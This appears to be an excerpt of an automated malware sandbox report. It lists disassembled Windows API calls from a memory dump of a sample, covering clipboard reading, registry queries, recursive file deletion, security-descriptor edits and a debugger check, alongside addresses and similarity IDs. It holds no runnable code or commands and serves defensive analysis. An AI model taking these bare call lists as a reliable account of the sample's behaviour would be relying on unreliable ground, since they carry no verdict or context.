                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F3368,?), ref: 006F33BB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F3368,?), ref: 006F33CE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F3368,?), ref: 006F343A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F338B: SetCurrentDirectoryW.KERNEL32(?,00000001,007C2418,?,?,?,?,?,?,?,006F3368,?), ref: 006F34BB
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006F3377
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 006FCEEE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0075FCCE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BuffCharLower
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F664A
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F665C
                                                                                                                                                                                                                                                                                • Part of subcall function 006F663E: FreeLibrary.KERNEL32(00000000,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F666E
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F66AB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6610
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6622
                                                                                                                                                                                                                                                                                • Part of subcall function 006F6607: FreeLibrary.KERNEL32(00000000,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6635
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00724FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0072319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00725031
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007253DF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0076F987
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0072319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00725031
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 006F3963
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1144537725-0
APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006F3A76
  • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00730A84,?,?,00000000,?,00730A84,00000000,0000000C), ref: 00730737
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 0075DC54: FindFirstFileW.KERNEL32(?,?), ref: 0075DCCB
  • Part of subcall function 0075DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0075DD1B
  • Part of subcall function 0075DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075DD2C
  • Part of subcall function 0075DC54: FindClose.KERNEL32(00000000), ref: 0075DD43
• GetLastError.KERNEL32 ref: 0076666E
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
APIs
  • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
  • Part of subcall function 00751A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
  • Part of subcall function 00751A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
  • Part of subcall function 00751A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
  • Part of subcall function 00751A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00751518
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0075154C
• GetLengthSid.ADVAPI32(?), ref: 00751563
• GetAce.ADVAPI32(?,00000000,?), ref: 0075159D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007515B9
• GetLengthSid.ADVAPI32(?), ref: 007515D0
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 007515D8
• HeapAlloc.KERNEL32(00000000), ref: 007515DF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00751600
• CopySid.ADVAPI32(00000000), ref: 00751607
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00751636
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00751658
                                                                                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0075166A
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00751691
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00751698
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007516A1
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516A8
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007516B1
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516B8
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007516C4
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007516CB
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: GetProcessHeap.KERNEL32(00000008,007514FD,?,00000000,?,007514FD,?), ref: 00751AED
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007514FD,?), ref: 00751AF4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007514FD,?), ref: 00751B03
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OpenClipboard.USER32(0078DCD0), ref: 0076F586
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0076F594
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0076F5A0
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F5AC
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F5E4
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F5EE
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F619
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0076F626
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0076F62E
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F63F
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F67F
                                                                                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0076F695
                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000F), ref: 0076F6A1
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0076F6B2
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0076F6D4
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0076F6F1
                                                                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0076F72F
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0076F750
                                                                                                                                                                                                                                                                              • CountClipboardFormats.USER32 ref: 0076F771
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0076F7B6
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00767403
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00767457
                                                                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00767493
                                                                                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007674BA
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 007674F7
                                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00767524
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                              • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0076A0A8
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0076A0E6
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0076A100
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0076A118
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A123
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A13F
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A18F
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A1AD
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A1B7
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A1C4
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A1D4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00764785
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007647B2
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 007647E2
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00764803
                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00764813
                                                                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0076489A
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007648A5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007648B0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                              • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0076A203
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0076A25E
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A269
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A285
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A2D5
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A2F3
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A2FD
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A30A
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0076A31A
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0075E3B4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C99E
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0077CA09
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077CA2D
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077CA8C
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0077CB47
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CBB4
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CC49
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0077CC9A
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CD43
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077CDE2
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077CDEF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
